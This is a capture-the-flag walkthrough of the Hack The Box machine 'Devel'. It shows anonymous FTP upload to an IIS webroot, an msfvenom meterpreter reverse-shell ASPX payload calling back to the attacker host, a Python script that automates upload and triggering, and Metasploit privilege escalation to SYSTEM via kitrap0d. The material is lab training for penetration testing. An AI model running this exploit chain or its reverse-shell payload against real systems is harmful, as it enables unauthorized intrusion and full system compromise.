Devel
HTB - 4. Devel
nmap -T4 -p- -A 10.10.10.5
shows 21 (FTP) with anonymous login allowed (the directory listing looks like a web root; confirmed below) and 80 (HTTP) with Microsoft IIS httpd 7.5.

Go to http://10.10.10.5, which is the default IIS page.

Directory brute force: dirbuster (dirb and gobuster are popular as well) against http://10.10.10.5:80 with the wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt, and set the file extensions to asm, asmx, asp, aspx, txt because the server is IIS (ASP.NET).

FTP: upload a file to the server
ftp 10.10.10.5 (login anonymous / anonymous)
ls
pwd
put dog.jpg
ls
Go to http://10.10.10.5/dog.jpg and the file is served. The anonymous FTP root is the IIS webroot, so anything we can write over FTP is reachable over HTTP, and an uploaded .aspx will be run by the ASP.NET handler instead of being served as a static file.

msfvenom
Create a reverse_tcp payload in ASPX format:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > ex.aspx
Start a handler listening for the callback (LPORT defaults to 4444, matching the payload):
sudo msfconsole
use exploit/multi/handler
options
set payload windows/meterpreter/reverse_tcp
options
set LHOST 10.10.14.24
run
Back in FTP:
binary <-- switch to binary mode instead of ASCII so the payload is not mangled in transfer
put ex.aspx
Go to http://10.10.10.5/ex.aspx and the shell pops. The browser request stays pending while the session is alive, because the payload runs inside the request thread; that is expected.

Hacked
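The foothold above (confirm the FTP root really is the webroot, upload the ASPX in binary mode, trigger it) as one script. This is an added example, not code from the original writeup. It assumes the target is 10.10.10.5, that anonymous FTP is writable, that ex.aspx was already generated with msfvenom and the handler is running; the `put`/`get` parameters are hooks so the logic can be exercised offline with fake clients, and the function names are my own.

```python
# Added example: script the Devel foothold. Not part of the original writeup.
# Assumptions: anonymous FTP writable, target 10.10.10.5, ex.aspx generated
# with msfvenom beforehand, multi/handler already listening.
import ftplib
import io
import secrets
import socket
import urllib.error
import urllib.request


def ftp_put(host, name, data, user="anonymous", passwd="anonymous"):
    """Upload bytes over anonymous FTP. storbinary issues TYPE I first, which
    is the scripted equivalent of typing 'binary' before 'put ex.aspx'."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login(user, passwd)
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))


def http_get(url, timeout=10):
    """Return (status, body). HTTP errors come back as a status, not an
    exception; a timeout returns (None, b'') because a live reverse shell
    never finishes the request."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as exc:
        return exc.code, b""
    except (urllib.error.URLError, socket.timeout):
        return None, b""


def ftp_root_is_webroot(host, put=ftp_put, get=http_get):
    """Upload a file with a random name AND random content, then fetch it over
    HTTP. Checking the content (not just a 200) proves the FTP root is the IIS
    webroot, not a directory that happens to contain a same-named file.
    .txt is used because IIS serves it as a static file."""
    name = f"chk-{secrets.token_hex(4)}.txt"
    token = secrets.token_hex(16).encode()
    put(host, name, token)
    status, body = get(f"http://{host}/{name}")
    return status == 200 and body.strip() == token


def stage_and_trigger(host, payload, remote_name="ex.aspx",
                      put=ftp_put, get=http_get):
    """Upload the ASPX payload bytes and request it once with a short timeout.
    200 or a hang (None) both mean the ASP.NET handler ran the page; a 404
    means the webroot mapping or the .aspx handler is not what we assumed."""
    put(host, remote_name, payload)
    status, _ = get(f"http://{host}/{remote_name}", timeout=5)
    return status in (200, None)


if __name__ == "__main__":
    target = "10.10.10.5"
    if not ftp_root_is_webroot(target):
        raise SystemExit("FTP root is not served over HTTP; stop here")
    with open("ex.aspx", "rb") as fh:  # generated by msfvenom, see above
        aspx = fh.read()
    print("FTP root == webroot; payload triggered:",
          stage_and_trigger(target, aspx))
```

The random token matters: a fixed filename like dog.jpg that returns 200 only shows that some file of that name exists under the webroot, while matching random content shows it is the file you just wrote. The 5-second timeout on the trigger is deliberate, since a successful meterpreter stage holds the request open.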
sysinfo
getuid
Result: we are IIS APPPOOL\Web, not NT AUTHORITY\SYSTEM. getsystem failed.

Check which privilege escalation exploits might work:
background
search suggester
use post/multi/recon/local_exploit_suggester
options
set SESSION 1
run
Run the privilege escalation:
use exploit/windows/local/ms10_015_kitrap0d
options
set SESSION 1
options
run
options
set lhost 10.10.14.24 <-- make sure this is the VPN interface address, not the default interface
set lport 4445 <-- need a different port, since 4444 is already in use by the handler for session 1
options
run
Result: a new shell pops as NT AUTHORITY\SYSTEM.